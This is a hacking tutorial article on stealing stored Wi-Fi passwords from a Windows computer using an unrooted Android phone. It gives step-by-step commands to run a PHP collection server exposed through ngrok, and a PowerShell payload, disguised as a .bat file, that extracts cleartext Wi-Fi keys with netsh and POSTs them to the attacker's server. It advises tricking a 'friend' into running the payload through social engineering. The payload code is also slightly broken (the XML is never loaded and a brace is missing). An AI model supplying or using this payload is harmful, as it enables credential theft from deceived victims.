Hack Wifi Without Rooting Android Devices

Aircrack-ng is the most popular way for hacking wifi passwords. But this method takes long time for hijacking password. As it uses large wordlist for cracking the AP passwords. These method needs rooted android device with Kali installed. We will show you method to hack Wifi Passwords without rooting android device with single command line.

We will use Userland applications which allows to install Kali Linux on android devices without rooting. Aircrack-ng will not work in Userland as it required device root access.

So here we will start php server on hacker mobile & ngrok is used for forwarding. And will create an payload to execute in VICTIM Windows OS.


  • For testing we will use Xiaomi Redmi Note 4. You have install
    • UserLand – https://play.google.com/store/apps/details?id=tech.ula&hl=en_IN
    • ConnectBot – https://play.google.com/store/apps/details?id=org.connectbot&hl=en_IN
  • These applications will be used to gather Wifi Password.
  • As per the ethical hacking researcher of International Institute of Cyber Security, Userland will allow us to install different Linux distros on mobile. So here we will install Kali Linux & connect it will ConnectBot.
  • Click on Kali Linux enter password iicybersecurity@12345. You can write any password.
  • Type su && sudo apt-get update && sudo apt-get install net-tools
  • Type sudo apt-get install unzip && apt-mark build apache*
  • Then type sudo apt-get install php && sudo apt-get install screen
  • Type screen then again type screen

  • Type mkdir phpServer && type cd phpServer
  • Type nano index.php and this below code.
 <title> PHP Server </title>
  <h1> It works!</h1>
  $file = date("y-h-m") . ".credz" ;
  file_put_contents ($file , file_get_contents("php://input"));
  • Type php -S &
  • Type ps -ef to check whether php is running or not.
  • Go to https://dashboard.ngrok.com/signup create a new account. After then login through your account. Go to Auth & copy the auth token.
  • Type sudo apt-get install wget && type wget https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
  • Now type unzip ngrok-2.2.8-linux-arm64.zip, this will extract ngrok file in the same directory.
  • Type ./ngrok authtoken <Your authtoken>
  • Type screen
  • Then type ./ngrok http 80
  • Now to run this ngrok in background press key combination of Ctrl+a+n, this will move the ngrok command in background and return to the shell prompt.
  • According of the ethical hacking researcher of International Institute of Cyber Security this key combination can change on the mobile model.

  • Save the below code in .bat extension. For that you can use WPS office application for saving the bat file. Download the WPS office application : https://play.google.com/store/apps/details?id=cn.wps.moffice_eng&hl=en
  • Open application Click on + & then click on Document. Paste the below code in WPS office document editor. Save the file in payload.txt
  • Open file manager. rename file to payload.txt to payload.bat
Add-Type -AssemblyName System.Web;

$ngrokServer = "https://SUBDOMAIN.ngrok.io/index.php";

foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

  try {
    $oXml = New-Object System.XML.XMLDocument;
    $ssid = $oXml.WLANProfile.SSIDConfig.SSID.Name;
    $netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
    $pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
    $sendData += "SSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
  } catch {}


Invoke-WebRequest -Uri $ngrokServer -Method 'POST' -Body $sendData;
  • Now you make any social engineering trick to send this payload to your friend. Once your friend open the payload in Windows computer (VICTIM machine). Above code is powershell code which when run in powershell will extract all password in VICTIM system.
  • As commented by digital forensics expert of International Institute of Cyber Security, came code is used in some malware with powershell to get all passwords of the VICTIM system

  • You will get all the stored Wifi passwords to your android device.
  • Above you can see all stored passwords of Wifi in /home/iicybersecurity/phpServer/ directory.
  • For more information on others ways to hack wifi passwords please follow this youtube link.